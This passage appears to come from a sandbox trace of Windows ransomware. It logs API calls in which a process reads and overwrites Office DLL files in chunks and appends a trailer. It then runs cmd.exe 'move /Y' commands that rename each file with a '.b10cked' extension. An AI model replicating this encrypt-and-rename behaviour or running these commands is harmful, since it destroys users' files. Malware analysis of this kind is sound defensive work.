dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x39960 [0166.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0166.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x39478 [0166.117] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0166.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0166.949] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x39960 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x39960 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0166.950] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0166.950] ReadFile (in: 
hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.041] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xdcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xdcaf, lpOverlapped=0x0) returned 1 [0167.086] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.086] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.086] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xdcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xdcaf, lpOverlapped=0x0) returned 1 [0167.087] SetFilePointer (in: hFile=0x114, lDistanceToMove=-117935, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ccb1 [0167.087] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.088] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xdcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xdcaf, lpOverlapped=0x0) returned 1 [0167.089] SetFilePointer (in: hFile=0x114, lDistanceToMove=-117935, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ccb1 [0167.089] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.090] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xdcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xdcaf, lpOverlapped=0x0) returned 1 [0167.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0167.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRINTL32.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0167.095] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x39960 [0167.095] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.095] CloseHandle (hObject=0x114) returned 1 [0167.097] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX") returned 0x3c [0167.097] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.098] CreateProcessW (in: lpApplicationName=0x0, 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xdf8, dwThreadId=0x910)) returned 1 [0167.103] CloseHandle (hObject=0x1b4) returned 1 [0167.103] CloseHandle (hObject=0x114) returned 1 [0167.103] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.103] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.103] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.103] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.103] ReleaseMutex (hMutex=0xf8) returned 1 [0167.103] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.103] 
ReleaseMutex (hMutex=0xf8) returned 1 [0167.103] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.103] ReleaseMutex (hMutex=0xf8) returned 1 [0167.103] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.103] ReleaseMutex (hMutex=0xf8) returned 1 [0167.104] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.104] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.104] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.104] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.104] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22389361925) returned 1 [0167.104] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, 
lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x47878 [0167.106] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x47d60 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x47d60 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.128] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.168] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.180] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0167.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.183] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.183] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.183] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0167.184] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27d60 [0167.184] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.185] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.186] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0167.187] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27d60 [0167.187] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.188] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.188] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0167.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0167.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x1328744, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPIR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 17 [0167.194] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x47d60 [0167.194] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, 
lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.194] CloseHandle (hObject=0x114) returned 1 [0167.202] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX") returned 0x3c [0167.203] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.204] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 